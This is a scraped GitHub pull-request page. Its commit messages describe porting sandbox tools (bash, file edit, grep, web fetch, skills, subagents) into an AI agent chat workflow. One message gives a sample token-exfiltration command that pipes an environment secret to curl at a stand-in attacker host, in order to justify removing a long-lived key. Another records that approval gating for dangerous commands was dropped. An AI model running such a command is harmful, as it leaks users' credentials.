Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: <path>` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool- call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub- `streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow. New (SRP, one function per file): - lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata. - lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records. - lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata. - lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts. Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4). Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>) Tests: 3106/3106 pass; production typecheck clean; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594) Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple chunks during the subagent run so the chat UI can render: - An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp - A live `pending: {name, input}` indicator for each tool-call - Accumulated `usage` after each finish-step - A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering `toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context. New (SRP, one function per file): - lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders. Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match. Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597) * feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7) Third open-agents → api cutover bundle. The handler hardcoded `workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set `currentBranch`, so the agent had no environment info in its system prompt and had to run `pwd` / `git branch` on every turn. Production verification (today, before this fix): agent: "My system prompt does not contain working directory or branch information." After this fix the agent receives an Environment section + Current branch line + cloud-sandbox checkpointing block — same shape as open-agents (sandbox.recoupable.com) emits. Changes: - New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles environment section → Current branch → cloud-sandbox checkpointing → custom instructions, all conditional on inputs. Mirrors open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts). - New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}` placeholder substitution. - `handleChatWorkflowStream`: connect the sandbox once for both skill discovery AND cwd/branch reading, then thread real values into `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves today's behavior; tools surface real errors later when they reconnect). - `runAgentStep`: build the system prompt via `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})` instead of using the static `agentCustomInstructions` directly. Scope reduced from the original "A.7+9" bundle: dropped contextLimit plumbing because it's a client-side display concern in open-agents, not server-side model routing (verified via grep — open-agents' server never reads context.contextLimit either). Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring); full suite 3121/3121 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore(chat-workflow): drop currentBranch handling from system prompt Per direction: branch is always `main` (the default branch) in api's deployment topology, so the per-branch `Current branch: <name>` line and cloud-sandbox checkpointing block don't add information today. Strip the templating to keep the system prompt focused on what's load-bearing (the Environment section indicating workspace-relative paths). - Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real per-session branch) - Drop `currentBranch` from `buildAgentSystemPrompt` options + rendering - Stop reading `sandbox.currentBranch` in handleChatWorkflowStream (the field stays on AgentContext.sandbox for type completeness; also consumed by createSandboxHandler unchanged) - Remove branch-related test cases Can be re-added later if/when meaningful per-session branches (e.g. xx/abcdef12 generated branches) land. Tests: 3119/3119 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call Build failure on bf1e245 — runAgentStep was still passing `currentBranch: input.agentContext.sandbox.currentBranch` after buildAgentSystemPrompt's option was removed. Stripping it. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599) Fourth open-agents → api cutover bundle. runAgentStep was sending the same system prompt + tool definitions on every turn as fresh input, even though Anthropic prompt caching can shave 90% off subsequent input cost. Production traces showed `cacheReadTokens: 0` on every api turn, while open-agents shows cacheRead matching cacheWrite from the prior turn — i.e. open-agents reuses the cached prefix. Changes (SRP — one function per file): - `lib/agent/contextManagement/isAnthropicModel.ts` — predicate port of open-agents' `packages/agent/context-management/cache-control.ts:5`. - `lib/agent/contextManagement/addCacheControlToTools.ts` — marks the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only conserves Anthropic's 4-breakpoint limit. - `lib/agent/contextManagement/addCacheControlToMessages.ts` — marks the LAST message with `cacheControl` on every step, per Anthropic's "mark the final block of the final message" guidance. `runAgentStep` now: - Wraps the tool set via `addCacheControlToTools(...)` before passing to streamText (static — set once per step). - Adds a `prepareStep` callback that wraps `messages` via `addCacheControlToMessages(...)` on every internal model call. Production behavior reproducer (Haiku 4.5, identical 2-turn prompt to both backends): api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952 turn2 cacheWrite=0 cacheRead=0 cost=$0.005959 → flat cost; full input billed every turn. open-agents prod: turn1 cacheWrite=10966 cacheRead=0 turn2 cacheWrite=12 cacheRead=10966 cost drops 12x → near-full prefix re-read from cache on turn 2. After this PR, api should match open-agents' caching curve. Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5 addCacheControlToMessages + 2 runAgentStep wiring assertions); full suite 3138/3138 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): forward Privy JWT as RECOUP_ACCESS_TOKEN (Bundle A.4) (#601) Fifth and final open-agents → api cutover bundle. The chat UI sends a short-lived Privy JWT in the workflow request body as `recoupAccessToken`. Today api silently strips it via Zod's default `.strip()` mode and never plumbs it into the sandbox env, so the `recoup-api` skill's curl examples can't authenticate as the user. Production reproducer (today, before this fix): api prod: recoup-api skill loads. curl returns "RECOUP_ACCESS_TOKEN is not set" → 401. Agent: "you need to sign in." open-agents prod: recoup-api skill loads. curl returns HTTP 200 with the user's account_id. Plumbing (all three layers TDD red → green): - lib/chat/validateChatWorkflow.ts — accept `recoupAccessToken: z.string().min(1).max(8192).optional()` in the body schema. Open-agents-shape compatible. - lib/agent/tools/AgentContext.ts — add `recoupAccessToken?: string` field. Mirrors open-agents' `packages/agent/types.ts:29`. - lib/chat/handleChatWorkflowStream.ts — conditionally spread the token into `agentContext` when validator surfaced it. - lib/agent/tools/buildRecoupExecEnv.ts — inject `RECOUP_ACCESS_TOKEN` into the sandbox exec env when the field is set. The recoup-api skill's curl examples reference this env var. Security note: only forward the token when the caller sent it in the body (chat UI path). x-api-key callers don't set this field, so their long-lived `recoup_sk_…` key is never exfiltratable from the sandbox env. Maintained from the prior code comment. Tests: 5 new (3 buildRecoupExecEnv + 1 validator + 1 handler); plus 1 handler omit-when-undefined assertion. Full suite 3144/3144 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

cubic-dev-ai Bot reviewed May 21, 2026

View reviewed changes

vercel Bot deployed to Preview May 21, 2026 18:43 View deployment

cubic-dev-ai Bot reviewed May 21, 2026

View reviewed changes

sweetmantech merged commit 51fd649 into test May 21, 2026
6 checks passed

sweetmantech deleted the feat/api-chat-workflow-leaf-tools branch May 21, 2026 18:49

sweetmantech mentioned this pull request May 21, 2026

release: 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (#585) #586

Merged

		@@ -0,0 +1,103 @@
		import { describe, it, expect, vi, beforeEach } from "vitest";

Conversation

sweetmantech commented May 21, 2026 • edited by cubic-dev-ai Bot Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Summary by cubic

Uh oh!

vercel Bot commented May 21, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

coderabbitai Bot commented May 21, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Rate limit exceeded

Uh oh!

sweetmantech commented May 21, 2026

Multi-tool E2E verified on preview ✅

Tools the agent autonomously invoked

Model wrap-up (`finishReason: "stop"`)

Tools not exercised in this E2E

Verification recap

Uh oh!

cubic-dev-ai Bot left a comment • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

Uh oh!

cubic-dev-ai Bot May 21, 2026

Choose a reason for hiding this comment

Uh oh!

cubic-dev-ai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

sweetmantech commented May 21, 2026

E2E: all 8 tools verified end-to-end

Tool execution

Model wrap-up

Coverage summary across both E2E runs

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

sweetmantech commented May 21, 2026 •

edited by cubic-dev-ai Bot

Loading

vercel Bot commented May 21, 2026 •

edited

Loading

coderabbitai Bot commented May 21, 2026 •

edited

Loading

cubic-dev-ai Bot left a comment •

edited

Loading